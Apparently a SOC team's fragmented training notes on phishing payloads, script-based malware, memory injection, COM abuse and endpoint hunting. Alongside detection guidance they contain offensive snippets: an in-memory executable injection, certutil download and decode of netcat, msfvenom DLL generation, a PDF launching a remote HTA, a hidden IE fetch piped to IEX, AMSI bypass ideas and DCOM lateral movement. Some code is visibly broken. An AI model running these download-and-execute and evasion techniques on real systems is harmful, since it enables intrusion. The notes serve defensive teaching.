# Phishing 2



### Dynamic Data Exchange

Interprocess communication method allowing programs to communicate with each other


### Object Linking and Embedding

Allows a document to be actively linked to another or embedded within another document.  Classic example is a malicious .bat file embedded into a word document and made to look like a legitimate embedded document.



## Identifying Injected Code

There are a [number of different memory injection techniques](https://git.uscis.dhs.gov/USCIS-SOC/FO/blob/master/training/docs/Phishing%20To%20Injection%20Techniques.md#memory-injection-techniques) that can also be used to run untrusted code inside the memory of a process.

When EXEs and DLLs are loaded into memory to run, they should have an associated file path which corresponds to their actual location on the disk. However, it is possible to load a file into memory from over the network so that the program executing is never written to disk.

We can simulate this technique by downloading the benign program `GoTeam.exe` and writing it into memory with the `New-InjectedThread` function from Jared Adkinson's [PSReflect-Functions](https://github.com/jaredcatkinson/PSReflect-Functions):

```
$uri = 'https://s3.amazonaws.com/exercise-pcap-download-link/GoTeam.exe'
$exe = Invoke-WebRequest -Proxy http://10.76.225.15 -Uri $uri -UserAgent 'C15IE72011A'
New-InjectedThread -Id $pid -ByteArray $exe.Content
```

The `New-InjectedThread` function allocates PAGE_EXECUTE_READWRITE (RWX) memory in the process and writes the bytes of the program to it:

![](images/Obtaining%20Artifacts%20From%20Memory/image026.png)<br><br>

Open up an admin PowerShell window and detect this with the `Get-InjectedThread` function:

![](images/Obtaining%20Artifacts%20From%20Memory/image027.png)<br><br>

We now know the base address of the memory segment the program was written to and can use the `Get-ProcessMemoryInfo` function from [PowerShellArsenal](https://github.com/mattifestation/PowerShellArsenal) to find it:

![](images/Obtaining%20Artifacts%20From%20Memory/image028.png)<br><br>

Use the `Get-RawBytes` function to dump all the bytes stored in that memory segment and save it to a file named `Injected.exe`:

![](images/Obtaining%20Artifacts%20From%20Memory/image029.png)<br><br>







## PostExp

### Escaping Restricted Desktops
- Bypassing GPO
- Bypassing SRP (Certificate, Hash, Zone, Path)
- Bypassing AppLocker (Publisher, Hash, Path)
- Bypassing Virtual Apps (App in a VM, Citrix, VMware, Microsoft vApp products)
- Replace windows shell, others

- Access (PowerShell, Cmd, BYO, Notepad, Browser)

```powershell
$raw = Get-Content -Path c:\nc.exe -Encoding Byte
$b64 = [System.Convert]::ToBase64String($raw)
$begin = "-----BEGIN CERTIFICATE-----"
$end = "-----BEGIN CERTIFICATE-----"
"$begin$b64$end" | Out-File c:\nc.txt
```

Download with notepad
Convert with certutil.exe -decode nc.txt nc.exe


### Download and Convert file
certutil.exe -urlcache -split -f http://example/file.txt file.bl

### Run alternate payloads

- use msfvenom to create a DLL that runs a command or program
```
msfvenom -p windows/exec -f dll CMD-calc.exe -o calc.dll
rundll32.exe mim.dll,Main
rundll32.exe mim.dll,Main
```

- use functions from system DLLs, such as CMD screensaver
```
copy System32\cmd.exe Temp\cmd.scr
rundll32.exe desk.cpl,InstallScreenSaver C:\Windows\Temp\cmd.scr
```

### PowerShell


[deliver ransomware](https://dexters-lab.net/2018/10/18/gandcrab-detail-analysis-of-js-delivery-payload/)

[zip file](https://threatpost.com/us-government-site-removes-link-to-cerber-ransomware-downloader/127767/)

[RTF doc](https://blog.talosintelligence.com/2017/09/fin7-stealer.html)



The most common non-PE threat file types are [JavaScript and VBScript](https://cloudblogs.microsoft.com/microsoftsecure/2018/06/07/machine-learning-vs-social-engineering/)




Could be run outside the browser
- Email attachments
- Containers with embedded scripts  (PDF/docs/hta/wsf)
-



## Debugging a Script

[this video](https://www.youtube.com/watch?v=uqhBsWXUw7Q)

Javascript -> Wscript -> Shell32.dll -> ShellExecuteExW

					  -> WS2_32.dll  -> WSASocketW, GetAddrInfoExW, WSASend, WSAAddressToStringW, WSAStartup



Load Wscrip.exe in the debugger

Change the command line and add the full path of the script

Set breakpoints on shell32.dll and ws2_32.dll because they aren't loaded yet

When they get loaded, set breakpoints on the APIs

Then see what is being passed to the API




### Encoding Scripts

```
$ori = 'WScript.Echo("Hello World!")'
(New-Object -Com Scripting.Encoder).EncodeScriptFile(".js",$ori,0,"") | Out-File helloworld.jse -NoNewline
.\helloworld.jse
```




- Use objects from COM or .NET
- PDFSharp is a C# interface to create, read, and modify PDFs


```
Add-Type -Path C:\pdf\PdfSharp-WPF.dll
$doc = New-Object PdfSharp.Pdf.PdfDocument
$doc.Info.Title = "Phishing POC"
$js="app.launchURL('http://example.com/agent.hta')"
$doc.info.Creator = "@jimshew"
$page = $doc.AddPage()
$dictjs = New-Object PdfSharp.Pdf.PdfDictionary
$dictjs.Elements["/JS] = New-Object  ....

$doc.Internals.Catalog.Elements["/Names"] = $dictgroup
$doc.Save('C:\phish.pdf')
```

- UnmanagedPowerShell
- NotPowerShell
- PSAttack

PowerShell command order/precedence
- doskey alias (pre-Windows 10)
- Alias
- Function
- Cmdlet
- Executable

Use scripts in
- C:\scripts
- $HOME\Documents\WindowsPowerShell
- $PSHOME

PowerShell Autoruns

Profile running locations and context
- $HOME\Documents\WindowsPowerShell\Profile.ps1
- $HOME\Documents\Profile.ps1
- $PSHOME\Microsoft.PowerShell_profile.ps1
- $PSHOME\Profile.ps1
- $HOME\Documents\WindowsPowerShell\Microsoft.PowerShellISE_profile.ps1
- $PSHOME\Microsoft.PowerShellISE_profile.ps1

Add a path

```
$origpaths = (Get-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Session Manager\Environment" -Name PSModulePath).PSModulePath
$newPath = $origpaths+";C:\Users\J\OneDrive\PowerShell\"
Set-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manger Environment" -Name PSModulePath -Value $newPath
```

Put payload in $PSHOME\PSConsoleHostReadline.bat

Empire (one-liners, batch files, dlls)

### Escape and Escalation

Working around restrictions, gaining permissions

Grsecurity and Pax patch the Linux kernel and gcc to restrict exploitation of common bugs, RBAC
SELinux/AppArmor/AppLocker
	SELinux limits by inode, AppArmor by filepath, AppLocker by path,cert,program

Manipulate services, config files, exes, libraries
kernel flaws, suid/sguid binaries, custom applications/scripts







- [Detecting Post-Exploitation Modules](#detecting-post-exploitation-modules)
- [Building a DotNet Assembly](#building-a-dotnet-assembly)
- [Running DotNet Assemblies in Memory](#running-dotnet-assemblies-in-memory)
	- [Serialization](#serialization)
- [Detecting DotNet Assemblies](#detecting-dotnet-assemblies)


https://www.endgame.com/blog/technical-blog/hunting-memory-net-attacks




https://www.endgame.com/resource/video/derbycon-talk-hunting-memory-resident-malware


## Detecting Post-Exploitation Modules



PowerPick - run PS without PS
- Sharp Pick - C# binary allows you to execute PS with C# (using .NET APIs)
- Unmanaged PowerShell - implements the .NET CLR in C++ binary


In Empire and Beacon, .NET assembly is used to run PowerShell scripts in memory.

We can also use .NET assemblies to perform post-exploitation jobs.



## Building a DotNet Assembly

.NET's `System.Reflection` namespace can be used to create dynamic assemblies that run directly from memory.  They do this by loading the .NET CLR into the current process and use it to access the Windows API (unmanaged PowerShell).  By creating a dynamic assembly in memory, we can define our own methods that call Windows API functions.  So they will either start a new process to inject into or inject into a currently running process.

- Download DotNetToJScript from github `git clone https://github.com/tyranid/DotNetToJScript.git`
- Extract


```powershell
# Compile the .NET assembly
C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe -out:getAdUsers.exe C:\Users\atstaple\FO\training\docs\test\getAdUsers.cs
```


## Running DotNet Assemblies in Memory

### Serialization

Techniques used to represent serialized data: XML or JSON or YAML

## Detecting DotNet Assemblies

Who are we looking for?
Open source, Evasive and all-in-memory execution:
Asynchronous payloads, Implemented as reflective DLLs, can bypass AV and IPS, modules for encrypted exfiltration
Think about the process talking and the actions acceptable from it.
Browsers, application updaters, etc. normally talk to the Internet, notepad, lsass, etc. do not.








From there, the .NET CLR can be







# Hunting on the Endpoint


https://www.infocyte.com/blog/2017/7/10/red-teams-advance-in-memory-evasion-tradecraft

https://www.infocyte.com/blog/2017/11/30/6-host-indicators-of-compromise



You need :
- Visibility (endpoints and network)
- Historical Data (event logs, network data)
- Analysis process that defeats anti-forensics (memory analysis, centralized logging)


endpoint
- logons/logoffs, account creation/deletion/modification
- process creation/termination (auditd), use of sensitive privileges
- Centralized logging
- Directly examine RAM, not using APIs

memory
- on-disk and memory malware
- ps and cmd activity missed by agents and disk forensics
- historical information no longer tracked by APIs


Proactive hunting makes you familiar with environment, discover gaps in tools, network, everything learned is documented, fed into IR/Hunt
Familiarity with normal allows better detection of abnormal and effective response

-	Running processes		name, path to exe, parent, privs, network connections,
-	Kernel drivers			normal
-	Scheduled Tasks		normal
-	Services			know normal
-	AV and EDR			know normal
-

Secure DevOps	Richard Mogull
Deployable acquisition/sampling tools and agents

Ensure relevant activity is logged and recoverable

When detected, only kill the thread
- Stop-Thread -thread 504

Threat Hunting with PowerShell
- Gather with PUSH or PULL (PSHunt, PSGumshoe, Sysmon + WEF, Uproot, FireEyeHX)
- Investigate with PowerForensics (does not rely on API)


Create challenges and internal training based on real events

Hunting on Endpoint
- Carve & reduce evidence vol/bulk_extractor				(check if EXEs/DLL/drivers are signed, NSRL/md5deep hashes) md5deep -r /mount/evil-data | nsrllookup
- Automated Signature checks						(AV sigs, host and network IOCs, packing/entropy checks)
- Automated Memory Analysis 						(Redline, Malfind)
- Evidence of Persistence						(Autoruns)
- Review Event logs 							logparser
- Super Timeline							log2timeline
- Manual Memory
- Manual Signature checks



### Serialization



[Get-ClrReflection](https://gist.github.com/dezhub/2875fa6dc78083cedeab10abc551cb58)
- looks for unbacked CLR module in memory
- MEM_MAPPED, RW, MZ/PE at 0, not backed by file
- Saves modules loaded through the Assembly.Load(byte[]) method


The Get-InjectedThread.ps1 script from Jared Atkinson, creator of PowerForensics, looks for threads that were created as a result of memory injection.




staged
//     4 kb		stager
//   268 kb		reflective DLL
// 4,096 kb		stub prepending an encoded reflective DLL

stageless
//   268 kb 	reflective DLL

- Staging can be avoided by including full shellcode in payload
- Injected process that is spawned can be changed
- Does not require PowerShell, Office,
- Injection code is obfuscated in C# binary







Malicious JS, Web Pages, PDFs, and Office Documents, Browser-based malware,

Extending assembly knowledge to include x64 code analysis
o   RAX, RBX, RCX, RDX
o   R8, r9, r10, r11, r12, r13, r14, r15
o   Movq
o   Traditionally two types of 64-bit malware
Browser Helper Objects for 64-bit IE
Device Drivers (rootkits) for x64
o   32-bit malware on a 64-bit OS
Runs in WoW64 subsystem
32-bit executables load 32-bit DLLs located in Syswow64

Malicious Web Pages and Documents

Suspicious websites that might host client-side exploits
De-obfuscate malicious scripts with the help of script debuggers and interpreters
Examine Microsoft Office macros, PDF and RTFs

Use Fiddler, SpiderMonkey, box-js, base64dump.py, pdf-parser.py, peepdf.py, scdbg, olevba.py, oledump.py, rtfdump.py, and jmp2it.

-          Interacting with malicious websites to assess the nature of their threats
-          De-obfuscating malicious JavaScript using debuggers and interpreters
-          Analyzing suspicious PDF files
-          Examining malicious Microsoft Office documents, including files with macros
-          Analyzing malicious RTF document files






Triage is the process of responding to suspicious events, determining if a security incident took place, and deciding the priority of systems involved based on the severity of compromise.


state of security and severity of compromise.

eliminate false positives and confirm a security incident



This rations patient treatment efficiently when resources are insufficient for all to be treated immediately

Adversaries may use scripts to aid in operations and perform multiple actions that would
otherwise be manual.  Some scripting languages may
be used to bypass process monitoring mechanisms by directly interacting with the
operating system at an API level instead of calling other programs. Common scripting
languages for Windows include VBScript and PowerShell but could also be in the form
of command-line batch scripts

Many popular offensive frameworks exist which use forms of scripting for security
testers and adversaries alike. Metasploit, Veil, and PowerSploit are three examples
that are popular among penetration testers for exploit and post-compromise operations
and include many features for evading defenses. Some adversaries are known to use
PowerShell

Methods of Detection:

- agent-based scanning for indicators
- network-based scanning for indicators
- analyzing network capture
- responding to firewall, IPS/IDS or UTM alerts
- manual log analysis


Triage Steps

- [Script Analysis](#script-analysis)
- [Payload Analysis](#payload-analysis)
- [Build Detections](#build-detections)


## Script Analysis

OLE (Old Word, PPT, RTF, Excel)
	OLE	Olevba
		Cp file to .zip and unzip, then olevba the vbaProject.bin
	RTF	rtfobj

ZIP (New Word, PPT, Excel)
PDF

OLETools


Identify script type, obfuscation functions
Deobfuscate
Identify anti-analysis techniques



## Payload Analysis

Download and analyze the payload
Check malwr, virustotal, hybrid-analysis
Mine OSINT




## Build Detections

Strings, compiler artifacts, exif data, library / API imports not good indicators
In-memory strings, process handles mutex, accessed/created files/keys, network traffic are good


	OAPivot can be used to get related samples to test your YARA rules against





IR
- which systems were compromised account used
- were any new accounts created from these systems

Gather
- autoruns
- code injection
- processes
- services
- filesystem
- registry keys
- logs

PULL - CIMSweep, PSGumshoe, PSHunt
PUSH - Sysmon + WEF, Uproot, FireEyeHX

Get-InjectedThread looks at all threads and checks:
- if page of thread's base address is allocated but not backed by a file on disk

When detected, only kill the thread
- Stop-Thread -thread 504



Threat Hunting with PowerShell
- Gather with PUSH or PULL (PSHunt, PSGumshoe, Sysmon + WEF, Uproot, FireEyeHX)
- Investigate with PowerForensics (does not rely on API)







change return p --> console.log(p)

save as test1.js

node test1.js



Malicious scripts are increasing in popularity because of their ease of use and effectiveness.

Compiled programs run independently, but scripts are files containing code that must be interpreted and executed by another application.

For example, PowerShell, Visual Basic Script, JavaScript, and HTML.

It is appealing to an attacker because most systems already have a program that will interpret it.

Windows Scripting Host can interpret different script types:

Browsers also will execute many script types:

Example:
Zip file containing .wsf which uses encrypted js to download payload (Js.Nemucod downloads Locky)

Component Object Model (COM)
Registrationless COM
RegistrationHelper – bypass via cscript
	In Memory Assembly Execution Jscript – No DLL on disk


Windows Scripting Host (wscript,cscript) – multi-language script utility that runs JScript, VBA, VBScript, Perl, Python, PHP, Ruby, Basic
	Wscript.echo “Hello World!”
	Wscript.quit
JavaScript




https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack

https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor



decoy document
http://resources.infosecinstitute.com/russian-apt-groups-continue-stealthy-operations/



# Code Execution with COM Objects

Component Object Model (COM) Objects

Bridges gaps between components, interoperability between applications (Visual Basic, C, C++, .NET consumer and providers)

Native to the Windows OS


- [COM Overview]

COM Registration, and Resolution

Registration - creating registry entries that tell Windows where a COM server is located

COM components are cross-language classes backed by ( DLL, OCX (ActiveX Controls), TLB (Type Libraries), EXE, SCT (XML))

easy way to use different objects


Scriptlet

backs a COM object with a text file...   can call JScript or VBScript

HKCR is a virtual class used for registration

COM Object Type Resolution
CLSID - GUID
ProgID - String
Monikers - "scriptlet:http//example.com/file.sct"
Methods - GetObject(), CreateObject()


To register a COM object, use regsvr32.exe, regasm.exe, regsvcs.exe



Win32 API Access:
- PowerShell
- COM Objects, macros into worksheet  (if target doesn't have excel or office, can't use it)
- DotNetToJScript







Common objects used:

|||
|-|-|
|Word.Application||
|InternetExplorer.Application|
|Msxml2.XMLHTTP|
|Microsoft.XMLHTTP|
|WinHttp.WinHttpRequest.5.1|


```powershell
$ie=New-Object -c InternetExplorer.Application;$ie.Silent=$true;$ie.visible=$false;
$ie.Navigate2("\\eno-rs-c1-01\home$\atstaple\scripts\Say-Hello.ps1", 14, 0, $null, $null);while($ie.busy -eq $true){Sleep -m 100}
$r=$ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $null, $ie.document, $null).InnerHTML
[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($r)) | IEX
```







JScript and VBScript don't have Win32 API access...

- But if it loads a .NET assembly, now it has Win32 API access



Registration-Free COM Activation

ActCtx Object
- Microsoft.Windows.ActCtx Object
- Attach a Manifest or Download ManifestURL
- Loads DLL without registration

Registration Helper with Cscript
- Use ActiveXObject("System.EnterpriseServices.RegistrationHelper).InstallAssembly to load a DLL

DotNetToJScript
- In Memory Execution with JScript/VBScript
- Executes .NET assembly in JScript
- No DLL on disk


Hijacking COM Objects using ProcMon

Persistence with COM
- TreatAs hijack - valid object points to VBScript on Internet (serialization --> shellcode)
- COM Handler hijack (scheduled tasks)


pubprn.vbs (signed script) - runs any argument you give it with GetObject()

slmgr.vbs instantiates Scripting.Dictionary via CreateObject().  Hijack that object to make it run your code

AMSI hooks powershell, wscript, right before executeion when code is deobfuscated, decrypted
It uses a COM object that can be hijacked to bypass AMSI detections


Office-Addins
Persist


Privilege Escalation with COM



Lateral Movement with COM
- Using objects with interesting methods




COM
DCOM - interacting with objects over the network

```powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.0.0.134"))
$com.Document.ActiveView | Get-Member
```


DCOM applications can be used to instantiate COM objects to get arbitrary code execution

|COM Object|Method|
|-|-|
|Outlook|`CreateObject()`|
|Excel|`Run()`|
|WMI|`Create()`|
|MMC20|`ExecuteShellCommand()`|
